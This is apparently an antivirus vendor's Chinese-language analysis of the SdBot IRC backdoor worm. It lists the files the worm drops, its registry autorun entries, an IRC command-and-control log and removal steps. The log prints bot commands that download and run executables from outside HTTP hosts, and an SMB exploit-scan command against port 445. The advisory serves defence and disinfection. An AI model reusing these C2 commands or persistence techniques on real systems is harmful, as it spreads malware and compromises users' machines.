该病毒运行后，衍生病毒文件到系统程序目录下。添加注册表自动运行项与系统服务项以实现随机引导病毒体。创建大量线程用于扫描用户所在网络，若发现存在默认共享或弱口令则传播自身。此病毒为一个利用 Windows 平台下 IRC 协议的网络蠕虫，受感染用户可能会被操纵进行 Ddos 攻击、远程控制、发送垃圾邮件、创建本地 Tftp 、 FTP 等行为。

概述

行为分析

清除方案

概述

病毒名称： Backdoor.Win32.SdBot.awm

中文名称： recsl机器人

病毒类型： 后门类

文件 MD5： 2001D19F828FCE890562DDDB05D68797

公开范围： 完全公开

危害等级： 5

文件长度： 加壳后 76,583 字节，脱壳后518,656 字节

感染系统： WinNT4以上系统

开发工具： Microsoft Visual C++ 6.0

加壳类型 : PECompact变形壳

命名对照： AVG[Trojan horse IRC/BackDoor.SdBot2.SEB]

F-Prot[W32/Backdoor.AFUX]

McAfee [W32/Sdbot.worm.gen.l]

行为分析

衍生

1 、衍生下列副本与文件：

%Temporary Internet Files%\\1.exe

%Temporary Internet Files%\\d.exe

%System32%\\1.exe

%System32%\\dl.exe

%System32%\\helpersysem.exe Trojan-Proxy.Win32.Slaper.e

%System32%\\mysvcc.exe Backdoor.Win32.SdBot.awm

%System32%\\sysem.exe Backdoor.Win32.IRCBot.aak

注册表

2 、新建注册表键值：

HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\sysms

Value: String: "C:\\WINDOWS\\System32\\1.exe"

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\msvccc66

Value: String: "dl.exe"

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\mysvcig38

Value: String: "mysvcc.exe"

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\sysms

Value: String: "C:\\WINDOWS\\System32\\1.exe"

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunServices\\

msvccc66 Value: String: "dl.exe"

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunServices\\

mysvcig38 Value: String: "mysvcc.exe"

3 、修改注册表键值用以标记已感染：

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Ole\\EnableDCOM

New: String: "N"

Old: String: "Y"

HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\restrictanonymous

New: DWORD: 1 (0x1)

Old: DWORD: 0 (0)

HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\restrictanonymous

New: DWORD: 1 (0x1)

Old: DWORD: 0 (0)

连接

4 、连接的 IRC 服务器包括下列：

TCP->Server:66.1*9.*5.1*2:18080

TCP->Server:81.9*.1*8.2*4:16666

TCP->Server:209.1*0.*2.1*0:24104

5 、连接后的操作如下，包括从指定服务器下载并运行文件、对本地网络进行扫描文件共享目录等：

TCP->Server:66.1*9.*5.1*2:18080 ：

NICK CHN|

USER fbwwty 0 0 :CHN|

:NEWSLbb 001 CHN| :MySQL CHN|!~fbwwty@222.1*1.7.2*3

:NEWSLbb 376 CHN| :

:CHN| MODE CHN| :+i

USERHOST CHN|

:NEWSLbb 302 CHN| :CHN|=+~fbwwty@222.1*1.7.2*3

MODE CHN|+x+i

JOIN ##sl,##sl2 he 爃 e

:CHN|!~fbwwty@222.171.7.213 JOIN :##sl

:NEWSLbb 332 CHN|##sl :. 燿 http://72.2*.1.2*0/d.exe dl.exe 1

:NEWSLbb 333 CHN|##sl 10:30 PM 1175724995

:NEWSLbb 366 CHN| ##sl :End of /NAMES list.

:CHN|!~fbwwty@2*2.1*1.7.213 JOIN :##sl2

:NEWSLbb 332 CHN| ##sl2 :. 燿 http://72.2*.4.1*6/1.exe 1.exe 1

:NEWSLbb 333 CHN|##sl2 10:30 PM 1175372145

:NEWSLbb 366 CHN| ##sl2 :End of /NAMES list.

PRIVMSG ##sl :[DOWNLOAD]: Downloading

URL: http://72.*0.1.2*0/d.exe to: dl.exe.

PRIVMSG ##sl2 :[DOWNLOAD]: Downloading

URL: http://72.20.4.126/1.exe to: 1.exe.

PRIVMSG ##sl :[DOWNLOAD]: Downloaded 62.0 KB to dl.exe @ 31.0 KB/sec.

PRIVMSG ##sl :[DOWNLOAD]: Opened: dl.exe.

PRIVMSG ##sl :[DOWNLOAD]: Opened: dl.exe.

PRIVMSG ##sl2 :[DOWNLOAD]: Downloaded 71.2 KB to 1.exe @ 7.1 KB/sec.

PRIVMSG ##sl2 :[DOWNLOAD]: Opened: 1.exe.

TCP->Server:81.9*.1*8.234:16666

NICK CHN|

USER tjyqnod 0 0 :CHN|

:MySQL 001 CHN| :MySQL CHN|!~tjyqnod@2*2.1*1.7.213

:MySQL 376 CHN| :

:CHN| MODE CHN| :+i

USERHOST CHN|

:MySQL 302 CHN| :CHN|=+~tjyqnod@2*2.1*1.7.213

MODE CHN| +x+i

JOIN ##last,##last2 fe 爁 e

:CHN|!~tjyqnod@2*2.1*1.7.213 JOIN :##last

:MySQL 332 CHN| ##last :.advscan asn1smb 50 5 0 -r

:MySQL 333 CHN| ##last 10:30 PM 1175586546

:MySQL 366 CHN| ##last :End of /NAMES list.

:CHN|!~tjyqnod@2*2.1*1.7.213 JOIN :##last2

:MySQL 366 CHN| ##last2 :End of /NAMES list.

PRIVMSG ##last :[SCAN]: Random Port Scan started on 10.0.x.x:445

with a delay of 5 seconds for 0 minutes using 50 threads.

注： % System% 是一个可变路径。病毒通过查询操作系统来决定当前 System 文件夹的位置。 Windows2000/NT 中默认的安装路径是 C:\\Winnt\\System32 ， windows95/98/me 中默认的安装路径是 C:\\Windows\\System ， windowsXP 中默认的安装路径是 C:\\Windows\\System32 。

--------------------------------------------------------------------------------

清除方案

1 、 使用安天木马防线可彻底清除此病毒 ( 推荐 )

2 、 手工清除请按照行为分析删除对应文件，恢复相关系统设置。

(1) 使用安天木马防线结束病毒进程：

1.exe

dl.exe

mysvcc.exe

(2) 病毒添加的注册表项：

HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\

CurrentVersion\\Run\\sysms

Value: String: "C:\\WINDOWS\\System32\\1.exe"

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\

CurrentVersion\\Run\\msvccc66

Value: String: "dl.exe"

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\

CurrentVersion\\Run\\mysvcig38

Value: String: "mysvcc.exe"

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\

CurrentVersion\\Run\\sysms

Value: String: C:\\WINDOWS\\System32\\1.exe"

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\

CurrentVersion\\RunServices\\msvccc66

Value: String: "dl.exe"

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\

CurrentVersion\\RunServices\\mysvcig38

Value: String: "mysvcc.exe"

(3) 恢复注册表下列键值为旧值：

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Ole\\EnableDCOM

New: String: "N"

Old: String: "Y"

HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\

restrictanonymous

New: DWORD: 1 (0x1)

Old: DWORD: 0 (0)

HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\

restrictanonymous

New: DWORD: 1 (0x1)

Old: DWORD: 0 (0)

(4) 删除病毒释放文件：

%Temporary Internet Files%\\1.exe

%Temporary Internet Files%\\d.exe

%System32%\\1.exe

%System32%\\dl.exe

%System32%\\helpersysem.exe

%System32%\\mysvcc.exe

%System32%\\sysem.exe